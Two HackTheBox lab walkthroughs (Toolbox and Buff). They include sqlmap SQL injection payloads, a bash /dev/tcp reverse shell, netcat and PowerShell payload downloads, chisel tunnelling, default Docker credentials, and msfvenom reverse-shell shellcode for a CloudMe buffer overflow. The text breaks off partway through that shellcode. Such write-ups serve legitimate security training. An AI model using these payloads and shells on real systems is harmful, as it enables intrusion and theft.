29 Apr 2021
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Toolbox.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.236 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-25 14:23 JST
Nmap scan report for 10.10.10.236
Host is up (0.30s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
| 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MegaLogistics
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after: 2021-02-17T17:45:56
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m52s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-25T05:50:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 848.09 seconds
Gobuster Port 443:
root@kali:~# gobuster dir -u https://10.10.10.236 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.236
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/04/25 14:41:09 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/25 16:16:46 Finished
===============================================================
FTP Enumeration:
We can find docker-toolbox.exe.
root@kali:~# ftp 10.10.10.236
Connected to 10.10.10.236.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.236:inar1): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
226 Successfully transferred "/"
ftp> quit
221 Goodbye
SMB Enumeration:
root@kali:~# smbclient -N -L //10.10.10.236
session setup failed: NT_STATUS_ACCESS_DENIED
2. Getting User
According to the SSL certificate, this server hosts admin.megalogistic.com for a virtualhost.
Add this entry to /etc/hosts and access using web browser.
We can find a login form for an administrator.
root@kali:~# cat /etc/hosts | grep admin
10.10.10.236 admin.megalogistic.com
This page contains a login form, check if this login form has SQL injection.
We can use Burp Suite to create a text file for the further purpose.
root@kali:~# cat sqlmap.txt
POST / HTTP/1.1
Host: admin.megalogistic.com
Connection: close
Content-Length: 27
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://admin.megalogistic.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.megalogistic.com/
Accept-Encoding: gzip, deflate
Accept-Language: ja,ja-JP;q=0.9,en;q=0.8
Cookie: PHPSESSID=3fd8d348d81c7d2683bbad164dc0f3ab
username=test&password=test
Then, try to find an SQL injection with sqlmap.
root@kali:~# sqlmap -r sqlmap.txt --force-ssl
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:42:16 /2021-04-29/
[15:42:16] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:42:16] [INFO] testing connection to the target URL
[15:42:17] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:42:18] [INFO] testing if the target URL content is stable
[15:42:19] [INFO] target URL content is stable
[15:42:19] [INFO] testing if POST parameter 'username' is dynamic
[15:42:20] [WARNING] POST parameter 'username' does not appear to be dynamic
[15:42:21] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'PostgreSQL')
[15:42:23] [INFO] testing for SQL injection on POST parameter 'username'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:42:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:42:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:42:46] [INFO] testing 'Generic inline queries'
[15:42:47] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:42:52] [INFO] POST parameter 'username' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable (with --not-string="11")
[15:42:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:42:53] [INFO] POST parameter 'username' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[15:42:53] [INFO] testing 'PostgreSQL inline queries'
[15:42:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:42:54] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
got a 302 redirect to 'https://admin.megalogistic.com:443/dashboard.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[15:43:51] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[15:43:51] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:44:04] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[15:44:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[15:44:35] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:44:36] [INFO] heuristic (basic) test shows that POST parameter 'password' might be injectable (possible DBMS: 'PostgreSQL')
[15:44:37] [INFO] testing for SQL injection on POST parameter 'password'
[15:44:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:44:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:44:50] [INFO] testing 'Generic inline queries'
[15:44:51] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[15:44:54] [INFO] POST parameter 'password' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable
[15:44:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:44:55] [INFO] POST parameter 'password' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[15:44:55] [INFO] testing 'PostgreSQL inline queries'
[15:44:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:45:10] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[15:45:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[15:45:23] [INFO] POST parameter 'password' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[15:45:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: username=test' AND (SELECT (CASE WHEN (4255=4255) THEN NULL ELSE CAST((CHR(81)||CHR(83)||CHR(106)||CHR(79)) AS NUMERIC) END)) IS NULL-- qXuq&password=test
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=test' AND 6451=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6451=6451) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- ZQoE&password=test
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test';SELECT PG_SLEEP(5)--&password=test
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test' AND 2075=(SELECT 2075 FROM PG_SLEEP(5))-- Jmmv&password=test
Parameter: password (POST)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: username=test&password=test') AND (SELECT (CASE WHEN (1055=1055) THEN NULL ELSE CAST((CHR(84)||CHR(101)||CHR(101)||CHR(104)) AS NUMERIC) END)) IS NULL-- Gnvh
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=test&password=test') AND 7848=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7848=7848) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- cPkC
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test&password=test');SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test&password=test') AND 1750=(SELECT 1750 FROM PG_SLEEP(5))-- UTFh
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> q
[15:46:36] [ERROR] user quit
[*] ending @ 15:46:36 /2021-04-29/
root@kali:~#
We found couple of parameters that have SQL injection.
Using --os--shell option, we can gain a shell session.
root@kali:~# sqlmap -r sqlmap.txt --force-ssl --os-shell
___
__H__
___ ___["]_____ ___ ___ {1.4.11#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:49:31 /2021-04-29/
[15:49:31] [INFO] parsing HTTP request from 'sqlmap.txt'
[15:49:32] [INFO] resuming back-end DBMS 'postgresql'
[15:49:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: username=test&password=test') AND (SELECT (CASE WHEN (1055=1055) THEN NULL ELSE CAST((CHR(84)||CHR(101)||CHR(101)||CHR(104)) AS NUMERIC) END)) IS NULL-- Gnvh
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=test&password=test') AND 7848=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7848=7848) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- cPkC
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test&password=test');SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test&password=test') AND 1750=(SELECT 1750 FROM PG_SLEEP(5))-- UTFh
Parameter: username (POST)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: username=test' AND (SELECT (CASE WHEN (4255=4255) THEN NULL ELSE CAST((CHR(81)||CHR(83)||CHR(106)||CHR(79)) AS NUMERIC) END)) IS NULL-- qXuq&password=test
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: username=test' AND 6451=CAST((CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (6451=6451) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113)) AS NUMERIC)-- ZQoE&password=test
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test';SELECT PG_SLEEP(5)--&password=test
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test' AND 2075=(SELECT 2075 FROM PG_SLEEP(5))-- Jmmv&password=test
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[15:49:35] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[15:49:35] [INFO] fingerprinting the back-end DBMS operating system
[15:49:39] [INFO] the back-end DBMS operating system is Linux
[15:49:41] [INFO] testing if current user is DBA
[15:49:44] [INFO] retrieved: '1'
[15:49:45] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[15:49:45] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] n
[15:49:52] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
os-shell>
To get a reverse shell, we can execute the following command.
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.42/4443 0>&1'
do you want to retrieve the command standard output? [Y/n/a] n
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.236 49906
bash: cannot set terminal process group (2736): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ id
id
uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
user.txt is in the directory /var/lib/postgresql.
postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
f0183e44378ea9774433e2ca6ac78c6a flag.txt
3. Getting Root
Now we had a shell in a container of docker-toolbox.
The IP address of the container is 172.17.0.2 and we can guess 172.17.0.1 is the Docker host VM.
postgres@bc56e3cc55e9:/var/lib/postgresql$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 3601 bytes 606518 (592.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2573 bytes 3664168 (3.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 8239 bytes 3003425 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8239 bytes 3003425 (2.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
According to the document, the default credential is docker:tcuser.
To SSH, we have to spawn an interactive TTY shell using python3.
postgres@bc56e3cc55e9:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@bc56e3cc55e9:/$ ssh docker@172.17.0.1
ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
( '>')
/) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
(/-_--_-\) www.tinycorelinux.net
docker@box:~$
In /c/Users/Administrator/desktop, we can find root.txt (Is this intended?)
docker@box:/c/Users/Administrator/desktop$ cat root.txt
cat root.txt
cc9a0b76ac17f8f475250738b96261b3
30 Dec 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Buff.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.198 -sV -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 23:48 JST
Nmap scan report for 10.10.10.198
Host is up (0.43s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1213.36 seconds
Gobuster Port 8080:
root@kali:~# gobuster dir -u http://10.10.10.198:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.198:8080
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/12/27 14:15:39 Starting gobuster
===============================================================
/index.php (Status: 200)
/img (Status: 301)
/home.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/register.php (Status: 200)
/profile (Status: 301)
---
2. Getting User
Take a look at http://10.10.10.198:8080, we can find a subtitle that shows the running software and its version.
Using searchsploit, we can find an RCE Gym Management System 1.0 - Unauthenticated Remote Code Execution.
root@kali:~# searchsploit gym management
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Download (or use the one installed on Kali by default) the exploit, install the prerequisites for python2 and execute the script.
We can confirm that we had a shell execution.
root@kali:~# python -m pip install requests
---
root@kali:~# python -m pip install colorama
---
root@kali:~# python 48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
We got a web shell but we still don’t have OS shell.
Try to upload nc64.exe using Powershell after started local HTTP server that hosts nc64.exe.
On the localhost
root@kali:~# ls | grep nc64
nc64.exe
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
On the target machine
C:\xampp\htdocs\gym\upload> powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/nc64.exe -OutFile C:\xampp\htdocs\gym\upload\nc64.exe
�PNG
�
C:\xampp\htdocs\gym\upload> dir
�PNG
�
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
28/12/2020 00:22 <DIR> .
28/12/2020 00:22 <DIR> ..
28/12/2020 00:10 53 kamehameha.php
28/12/2020 00:22 45,272 nc64.exe
2 File(s) 45,325 bytes
2 Dir(s) 9,841,668,096 bytes free
Launch a local netcat listener and execute nc64.exe.
Now we got a reverse shell as shaun.
On the localhost
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
On the target machine
C:\xampp\htdocs\gym\upload> nc64.exe 10.10.14.42 4443 -e cmd.exe
On the localhost
root@kali:~# nc -nlvp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.10.198 49684
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
user.txt is in the C:\Users\shaun\Desktop.
C:\Users\shaun\Desktop>type user.txt
type user.txt
16a71e4eade671c342101c50b256e2ef
3. Getting Root
In C:\Users\shaun\Downloads> directory, we can find an interesting binary called CloudMe_1112.exe.
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,840,857,088 bytes free
Using the following command, we can see that actually this binary is running as a process.
C:\xampp\htdocs\gym\upload>tasklist -v | findstr CloudMe
tasklist -v | findstr CloudMe
CloudMe.exe 4128 0 38,552 K Unknown
Run searchsploit again for CloudMe.
We can find a buffer overflow exploit CloudMe 1.11.2 - Buffer Overflow.
root@kali:~# searchsploit cloudme
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We have to take a look at the default port of CloudMe.
We didn’t see port 8888 during the port scanning because only 127.0.0.1 is allowed to use it
On the localhost
root@kali:~# cat 48389.py | grep connect
s.connect((target,8888))
On the target host
C:\Users\shaun\Downloads>netstat -an
netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING
TCP 10.10.10.198:49684 10.10.14.42:4443 ESTABLISHED
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING
---
To use the exploit, we need port forwarding.
This time, Chisel was used for the purpose.
Run a web server on the localhost, upload the windows binary and run on the target machine.
On the localhost
root@kali:~# chmod +x chisel
root@kali:~# sudo ./chisel server -p 8001 --reverse -v
2020/12/29 12:52:49 server: Reverse tunnelling enabled
2020/12/29 12:52:49 server: Fingerprint 8fU8yodGKrxrXrjHCh9cAFAWAccwXWRyHQJCACbgB1g=
2020/12/29 12:52:49 server: Listening on http://0.0.0.0:8001
root@kali:~# ls | grep chisel
chisel
chisel.exe
root@kali:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the target machine
C:\Users\shaun\Downloads>powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/chisel.exe -OutFile chisel.exe
powershell Invoke-WebRequest -Uri http://10.10.14.42:8000/chisel.exe -OutFile chisel.exe
C:\Users\shaun\Downloads>chisel.exe client 10.10.14.42:8001 R:8888:127.0.0.1:8888
chisel.exe client 10.10.14.42:8001 R:8888:127.0.0.1:8888
2020/12/29 04:03:11 client: Connecting to ws://10.10.14.42:8001
2020/12/29 04:03:13 client: Connected (Latency 244.1625ms)
On the localhost
root@kali:~# sudo ./chisel server -p 8001 --reverse -v
2020/12/29 12:52:49 server: Reverse tunnelling enabled
2020/12/29 12:52:49 server: Fingerprint 8fU8yodGKrxrXrjHCh9cAFAWAccwXWRyHQJCACbgB1g=
2020/12/29 12:52:49 server: Listening on http://0.0.0.0:8001
2020/12/29 12:55:09 server: session#1: Handshaking...
2020/12/29 12:55:10 server: session#1: Verifying configuration
2020/12/29 12:55:10 server: session#1: tun: Created
2020/12/29 12:55:10 server: session#1: tun: SSH connected
2020/12/29 12:55:10 server: session#1: tun: proxy#R:8888=>8888: Listening
2020/12/29 12:55:10 server: session#1: tun: Bound proxies
On the localhost (another window)
root@kali:~# ss -antp | grep 8888
LISTEN 0 4096 *:8888 *:* users:(("chisel",pid=117962,fd=8))
We need to change the payload of the POC script.
Run the following command to generate it.
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4444 -b '\x00\x0A\x0D' -v payload -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xb8\xbd\xb5\xf0\x16\xda\xc8\xd9\x74\x24\xf4\x5a"
payload += b"\x2b\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x57"
payload += b"\x49\x12\xe3\x5b\x5a\x51\x0c\xa3\x9b\x36\x84\x46"
payload += b"\xaa\x76\xf2\x03\x9d\x46\x70\x41\x12\x2c\xd4\x71"
payload += b"\xa1\x40\xf1\x76\x02\xee\x27\xb9\x93\x43\x1b\xd8"
payload += b"\x17\x9e\x48\x3a\x29\x51\x9d\x3b\x6e\x8c\x6c\x69"
payload += b"\x27\xda\xc3\x9d\x4c\x96\xdf\x16\x1e\x36\x58\xcb"
payload += b"\xd7\x39\x49\x5a\x63\x60\x49\x5d\xa0\x18\xc0\x45"
payload += b"\xa5\x25\x9a\xfe\x1d\xd1\x1d\xd6\x6f\x1a\xb1\x17"
payload += b"\x40\xe9\xcb\x50\x67\x12\xbe\xa8\x9b\xaf\xb9\x6f"
payload += b"\xe1\x6b\x4f\x6b\x41\xff\xf7\x57\x73\x2c\x61\x1c"
payload += b"\x7f\x99\xe5\x7a\x9c\x1c\x29\xf1\x98\x95\xcc\xd5"
payload += b"\x28\xed\xea\xf1\x71\xb5\x93\xa0\xdf\x18\xab\xb2"
payload += b"\xbf\xc5\x09\xb9\x52\x11\x20\xe0\x3a\xd6\x09\x1a"
payload += b"\xbb\x70\x19\x69\x89\xdf\xb1\xe5\xa1\xa8\x1f\xf2"
payload += b"\xc6\x82\xd8\x6c\x39\x2d\x19\xa5\xfe\x79\x49\xdd"
payload += b"\xd7\x01\x02\x1d\xd7\xd7\x85\x4d\x77\x88\x65\x3d"
payload += b"\x37\x78\x0e\x57\xb8\xa7\x2e\x58\x12\xc0\xc5\xa3"
payload += b"\xf5\xe5\x13\xa5\x2f\x92\x21\xb9\x3e\x3e\xaf\x5f"
payload += b"\x2a\xae\xf9\xc8\xc3\x57\xa0\x82\x72\x97\x7e\xef"
payload += b"\xb5\x13\x8d\x10\x7b\xd4\xf8\x02\xec\x14\xb7\x78"
